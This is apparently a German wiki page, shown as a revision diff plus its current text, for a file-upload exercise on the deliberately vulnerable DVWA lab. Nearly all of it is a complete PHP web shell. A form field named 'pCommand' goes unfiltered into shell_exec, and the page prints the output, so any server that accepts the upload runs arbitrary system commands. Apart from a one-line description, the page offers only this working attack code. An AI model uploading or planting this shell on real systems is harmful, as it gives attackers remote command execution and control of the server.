DVWA File Upload Komando Ausführung: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 2: | Zeile 2: | ||
;Dieser PHP File so später Komandos ausführen | ;Dieser PHP File so später Komandos ausführen | ||
<pre> | <pre> | ||
| + | <nowiki> | ||
<form action="" method="post" enctype="application/x-www-form-urlencoded"> | <form action="" method="post" enctype="application/x-www-form-urlencoded"> | ||
<table style="margin-left:auto; margin-right:auto;"> | <table style="margin-left:auto; margin-right:auto;"> | ||
| Zeile 29: | Zeile 30: | ||
}//end if | }//end if | ||
?> | ?> | ||
| + | </nowiki> | ||
</pre> | </pre> | ||
Version vom 16. Juni 2021, 18:25 Uhr
file.php
- Dieser PHP File so später Komandos ausführen
<nowiki>
<form action="" method="post" enctype="application/x-www-form-urlencoded">
<table style="margin-left:auto; margin-right:auto;">
<tr>
<td colspan="2" style="text-align:center; font-weight: bold;color: #770000;">
Please enter system command
</td>
</tr>
<tr><td> </td></tr>
<tr>
<td style="font-weight: bold;">Command</td>
<td><input type="text" name="pCommand" size="50"></td>
</tr>
<tr><td> </td></tr>
<tr>
<td colspan="2" style="text-align:center;">
<input type="submit" value="Execute Command" />
</td>
</tr>
</table>
</form>
<?php
if (isset($_REQUEST["pCommand"])) {
echo "<pre>";
echo shell_exec($_REQUEST["pCommand"]);
echo "";
}//end if ?> </nowiki>